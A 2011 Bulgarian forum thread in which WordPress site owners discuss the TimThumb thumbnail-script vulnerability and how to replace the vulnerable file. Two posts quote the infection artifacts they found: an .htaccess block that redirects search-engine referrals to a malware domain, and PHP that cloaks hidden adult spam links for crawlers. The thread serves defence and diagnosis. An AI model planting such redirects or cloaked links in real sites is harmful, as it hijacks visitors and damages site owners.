Дупка в wordpress теми с Timthumb - Важно

ktomov

Premium
Re: Проблем с Вирус на Сайт

Съобщението към Мантамен.

Проблема е точно в това което си мислих. Не знам какъв те темплейта, но ползва елементарния скрипт timthumb.php, който се ползва за генериране на тъмбнейлите на снимките.
В началото на август месец беше открита дупка, която позволява включването на злонамерен код в сайта чрез тази дупка. Ефектите може да са много от елементарна редакция на някой файл за да си лепнат някой линк или вкарване на шел скрипт, който ще им даде почти пълен достъп до потребителя ти в хостинга.

За повече информация прочети това.

Решение на проблема е да замениш timthumb.php скрипта с най-новия, но въпреки това те съветвам първо да се консултиращ с момчето направил сайта, защото по някой път се случва дизайнерите да променят голяма част от конструкцията с цел промяна на размера и качеството на миниатюрите.

Публикувам го и тук, защото явно все още много хора не знаят за дупката която в момента имат (над 60% от темплейтите с които съм имал допир, а те са били много, са ползвали timthumb). Така, че си опичайте акъла и сменете timthumb-a на темплейтите си!

----------------------------------------------------------------

Hi,

Heads up !

This is the latest vulnerability. Check out this link :
http://www.h-online.com/security/news/item/Timthumb-PHP-script-opens-hole-in-WordPress-blogs-1317479.html

Millions of WP sites are affected. More about the whole thing here from the person who detected it. There are instructions on how to close the hole.
http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/

And here is the latest script to replace the vulnerable one.
http://timthumb.googlecode.com/svn/trunk/timthumb.php

Hope this helps and maybe WSD can include that in the dashboard Alerts.

Thanks.
Timthumb обикновено се намира на следните места:
wp-content/themes/името-на-темата/includes/timthumb.php
wp-content/themes/името-на-темата/functions/timthumb.php
wp-content/themes/името-на-темата/functions/thumb.php
wp-content/themes/името-на-темата/timthumb.php
wp-content/themes/името-на-темата/thumb.php

Десен бутон и Save as на това http://timthumb.googlecode.com/svn/trunk/timthumb.php и трябва да презапишете съществуващият файл във вашата тема.

Timthumb се ползва в над 90% от темите на elegantthemes и поне в 50% от тези на woothemes, така че съветвам всеки който ползва техни теми да прочете връзките в статията за да няма проблеми!
 
Последно редактирано:

coolice

Owner
Re: Проблем с Вирус на Сайт

най интересното е че не открих почти теми (направо не открих от тези които ползвам) които да го ползва

иначе търсете и thumb.php на места било кръстено така пак казвам не съм го засичал засега



http://wordpress.shadowlantern.com/2011/08/timthumb-php-is-vulnerable/
 

mantaman

Well-Known Member
От: Дупка в wordpress теми с Timthumb - Важно

Ето с какво се сдобивате в .htaccess
При мен тези неща бяха след около 200 празни реда назад във редовете извън видимата част може би има промени и в началните редове но тия със сигурност не са от сайта
Код:
ErrorDocument 400 http://securesoft -connection.ru/android/index. php                                                                                                                        

                                                                                                                        ErrorDocument 401 http://securesoft -connection.ru/android/index. php                                                                                                                        

                                                                                                                        ErrorDocument 403 http://securesoft -connection.ru/android/index. php                                                                                                                        

                                                                                                                        ErrorDocument 404 http://securesoft -connection.ru/android/index. php                                                                                                                        

                                                                                                                        ErrorDocument 500 http://securesof t-connection.ru/android/index. php                                                                                                                        

                                                                                                                        <IfModule mod_rewrite.c>                                                                                                                        

                                                                                                                        RewriteEngine On                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*google.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*ask.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*baidu.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*youtube.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*qq.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*excite.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*altavista.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*msn.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*netscape.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*aol.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*goto.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*mamma.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*lycos.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*search.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*bing.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*facebook.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*twitter.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*blog.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*live.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*myspace.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*mail.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*yandex.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*rambler.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*ya.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*aport.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]                                                                                                                        

                                                                                                                        RewriteCond %{HTTP_REFERER} .*flickr.*                                                                                                                        

                                                                                                                        RewriteRule ^(.*)$ http://securesoft -connection.ru/android/index. php [R=301,L]                                                                                                                        

                                                                                                                        </IfModule>
Умишлено съм строшил линковете в цитата не си играйте да ги пробвате
 
Последно редактирано от модератор:

go6o78

Member
От: Re: Проблем с Вирус на Сайт

най интересното е че не открих почти теми (направо не открих от тези които ползвам) които да го ползва

иначе търсете и thumb.php на места било кръстено така пак казвам не съм го засичал засега
http://wordpress.shadowlantern.com/2011/08/timthumb-php-is-vulnerable/
има ли и други варианти на името на файла
аз ползвам "Aspherical Theme" и не откривам подобен файл, а темата прави thumbnail на снимките
 

against

New Member
От: Дупка в wordpress теми с Timthumb - Важно

E тука има още инфо - http://code.google.com/p/timthumb/issues/detail?id=212

то май от около месец вече се върти експлойта и хаква наред.
Доколкото разбрах качва файловете в cache папката на темплейта, която е writable. Та там ако имате някакви съмнителни файлове, значи ясна работата.

Общо взето където го има тоя timthumb.php файл трябва да се делне и да се качи новия.
 

ktomov

Premium
Re: От: Дупка в wordpress теми с Timthumb - Важно

има ли и други варианти на името на файла
аз ползвам "Aspherical Theme" и не откривам подобен файл, а темата прави thumbnail на снимките
Твоя темплейт генерира tumbnails с вградената в wordpress фунцкия.

E тука има още инфо - http://code.google.com/p/timthumb/issues/detail?id=212

то май от около месец вече се върти експлойта и хаква наред.
Доколкото разбрах качва файловете в cache папката на темплейта, която е writable. Та там ако имате някакви съмнителни файлове, значи ясна работата.

Общо взето където го има тоя timthumb.php файл трябва да се делне и да се качи новия.
Не мисля, че само промяната упомената в линка ще реши проблема. Дупката е на дълбоко и не само в позволените сайтове. Свидетелство за това е, че за 2 версии разлика при сравняване на новия и стария файл, промените са в над 80% от файла. Самия механизъм на работа на кеша е променен.
Преди се генерирах файлове в папка cache с имена thumb_700bd4967a60e6fb181d0156f2961434.jpg и им се даваха права на запис и редакция (755/777 и ако не бяха с такива права, скрипта гърмеше с грешка), докато сега се генерират файлове по този начин timthumb_int_e29fadb97b695c385090ced476a939eb.timthumb.txt, които са абсолютно безвредни (и носят права 600 - четене и запис само от апаче и нищо друго).
Като цяло скрипта е дооооста изменен и съветвам всеки който иска да няма проблеми, да ъпдейтне до последната му версия, вместо да се чуди какви фиксове може да приложи на старата.
Разликата е огромна. И не е проблем, че самата папка има 755/777 за ползването на скрипта. Проблема беше, че всяка генерирана снимка вътре в нея беше с права 755/777, което позволява execution, което пък от своя страна значи, че всеки може да прикачи файл и да го ползва за да направи мизерии.

Малко допълнение за отговора ми към go6o78. Wordpress като цяло от доста време разполага с набор от функции позволяващ генериране на tumbnail на дадена картинка. Проблема беше в това, че са ограничени до няколко размера (малък, среден, голям). При тази функция, тези картинки се създават при качването на самата картинка от админ панела, т.е. еднократно и могат да се ползват само с тези размери.
От друга страна timthumb, пък е скрипт, който позволява от дадена снимка да речем 1000 х 1000 px да се генерират десетки други tumbnails с различна големина, като това става с параметри в url адреса: картинка.jpg&amp;h=130&amp;w=193&amp;q=60&amp;, където h - височина, w - широчина, q - качество на картинката (компресия). Тези миниатюри се генерират on the fly, т.е. в момента в който някой погледне страницата и се запазват в папка cache за по-късно ползване. Това е разликата в метода на работата на двете.
 

STRATEGA

Member
От: Дупка в wordpress теми с Timthumb - Важно

На официалната страницата на мойта тема имаше нова версия където проблема със сигурността е отстранен.Само направих ъпдейт на темата и битрябвало всичко да е ок.
 

billigg

New Member
От: От: Дупка в wordpress теми с Timthumb - Важно

имам тема на Genesis, Enterprice
в файла deprecated_functions.php имам следното съдържание .....(проблем ли е този "function genesis_timthumb"


/**
* @deprecated in 0.1.7
*
*/
function genesis_get_timthumb($src = null, $w = null, $h = null, $zc = null) {
return genesis_get_image(array('format' => 'src', 'size' => array($w, $h)));
}
function genesis_timthumb($src = null, $w = null, $h = null, $zc = null) {
genesis_image(array('format' => 'src', 'size' => array($w, $h)));
}





тъй като открих че по долу имам вкарани външни линкове

$seo_plugin=get_option("ranking");
if (strstr($_SERVER['HTTP_USER_AGENT'], 'Googlebot')) {
add_action('wp_footer', 'ranking');
}
$seo_plugin=get_option("ranking");
if (strstr($_SERVER['HTTP_USER_AGENT'], 'bingbot')) {
add_action('wp_footer', 'ranking');
}
$seo_plugin=get_option("ranking");
if (strstr($_SERVER['HTTP_USER_AGENT'], 'msnbot')) {
add_action('wp_footer', 'ranking');
}
$seo_plugin=get_option("ranking");
if (strstr($_SERVER['HTTP_USER_AGENT'], 'Slurp')) {
add_action('wp_footer', 'ranking');
}
function ranking() {
$pshow = " <span style='display:none;'><a href='http://www.liveprivates.com/listpage.php?psid=thierto'>Liveprivates</a> , <a href='http://www.liveprivates.com/girl/free&psid=thierto'>Girl</a> , <a href='http://www.liveprivates.com/mature/free&psid=thierto'>Mature female</a> ,<a href='http://www.liveprivates.com/girl/1822/free&psid=thierto'>Hot live sex Shows</a> , <a href='http://www.liveprivates.com/girl/blonde/free&psid=thierto'>Blonde</a> , <a href='http://www.2.livejasmin.com/listpage.php?psid=elenaa'>Livejasmin</a> , <a href='http://www.2.livejasmin.com/listpage.php?tags=mature&psid=elenaa'>Mature Female</a> , <a href='http://www.2.livejasmin.com/freechat.php?random&psid=elenaa'>Live sex - Hot live sex shows</a> , <a href='http://www.2.livejasmin.com/allonline.php?psid=elenaa'>Livejasmin adult cam</a></span>";
echo $pshow;
}

?>
 

ktomov

Premium
Проблема ти не е в timthumb в случая. По-скоро тук става въпрос до версия на темплейта с дупка в него или добавка, която позволява инжектиране на подобен код. (Зловреден е за класирането на сайта ти)
 

s1yf0x

Well-Known Member
От: Дупка в wordpress теми с Timthumb - Важно

Я провери за POST заявки към wp-admin
 

goromoro

New Member
От: Дупка в wordpress теми с Timthumb - Важно

Здравейте! Само в темата ли ако съдържа е проблем? Питам, защото в един от плъгините имам такъв файл.
Благодаря предварително.
 

Firefly

Well-Known Member
От: Дупка в wordpress теми с Timthumb - Важно

Няма значение къде е. Увери се, че е последна версия. Като цяло е най-добре изобщо да се ограничиш в използването на теми и плъгини с timthumb, защото е товарещ скрипт.
 

Torbalan Trolski

Well-Known Member
От: Дупка в wordpress теми с Timthumb - Важно

timthumb.... не са ли го забранили със закон този скрипт още? :)
Ако пък вместо да тупаш мнения беше погледал, че темата е от 2011 година ...
 

Горе